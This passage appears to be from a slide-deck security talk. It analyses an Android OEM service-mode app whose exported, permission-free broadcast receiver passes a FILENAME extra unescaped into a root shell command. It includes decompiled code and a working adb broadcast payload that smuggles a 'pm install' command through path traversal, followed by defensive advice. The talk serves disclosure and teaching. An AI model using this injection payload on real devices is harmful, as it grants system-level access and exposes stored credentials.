  134. 134. OEM SOFTWARE <receiver name=".FTATDumpReceiver"> <intent-filter> <action name="com.android.sec.FTAT_DUMP"></action> </intent-filter> </receiver> <receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING"> <intent-filter> <action name="com.android.sec.FAILDUMP"></action> </intent-filter> </receiver> Receiver declared twice
  135. 135. OEM SOFTWARE <receiver name=".FTATDumpReceiver"> <intent-filter> <action name="com.android.sec.FTAT_DUMP"></action> </intent-filter> </receiver> <receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING"> <intent-filter> <action name="com.android.sec.FAILDUMP"></action> </intent-filter> </receiver> Permission asked for this action
  136. 136. OEM SOFTWARE <receiver name=".FTATDumpReceiver"> <intent-filter> <action name="com.android.sec.FTAT_DUMP"></action> </intent-filter> </receiver> <receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING"> <intent-filter> <action name="com.android.sec.FAILDUMP"></action> </intent-filter> </receiver> No permission needed for this action!!
  137. 137. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } We read the FTATDumpReceiver source code
  138. 138. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Intercepts the FTAT_DUMP action
  139. 139. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Concats the FILENAME extra to str3
  140. 140. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Other concatenations follow
  141. 141. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Prepares an intent to FTATDumpService
  142. 142. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Adds the final string to the intent
  143. 143. OEM SOFTWARE public void onReceive(Context paramContext, Intent paramIntent) { String str1 = paramIntent.getAction(); if (str1.equals("com.android.sec.FTAT_DUMP")) { String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); [...] String str9 = str8 + [...] Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); localIntent2.putExtra("FILENAME", str9); paramContext.startService(localIntent2); } [...] } Starts the FTATDumpService with our FILENAME parameter as extra
  144. 144. OEM SOFTWARE public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0; } We read then the FTATDumpService source code
  145. 145. OEM SOFTWARE public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0; } Extracts the FILENAME extra to str
  146. 146. OEM SOFTWARE public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0; } Opens and starts a new thread
  147. 147. OEM SOFTWARE public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0; } Seems to “do a shell command” with our FILENAME parameter concatenated
  148. 148. OEM SOFTWARE private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true; } This is DoShellCmd function
  149. 149. OEM SOFTWARE private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true; } And runs it Creates a shell command
  150. 150. OEM SOFTWARE private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true; } And our FILENAME parameter is still not modified
  151. 151. OEM SOFTWARE private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true; } BINGO! And our FILENAME parameter is still not modified
  152. 152. OEM SOFTWARE Access to All permissions declared by system apps 156 for this case All files belonging to system user Wifi keys Password, PIN, gesture storage ...
  153. 153. OEM SOFTWARE $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #' Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) } Broadcast completed : result=0 A simple broadcast for FTAT_DUMP action
  154. 154. OEM SOFTWARE $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #' Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) } Broadcast completed : result=0 We declare the FILENAME argument
  155. 155. OEM SOFTWARE $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #' Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) } Broadcast completed : result=0 We point the destination file to null
  156. 156. OEM SOFTWARE $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #' Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) } Broadcast completed : result=0 We execute our system command
  157. 157. OEM SOFTWARE Open bar!
  158. 158. OEM SOFTWARE Moral of the story It happens at application level Look after your app’s backdoors Don’t export local services Use a strict permission model Consider every input as a threat Escape all sensitive parameters you receive
  159. 159. Thank You for your time ! SLIDES http://bit.ly/andbigfails http://eyal.fr

×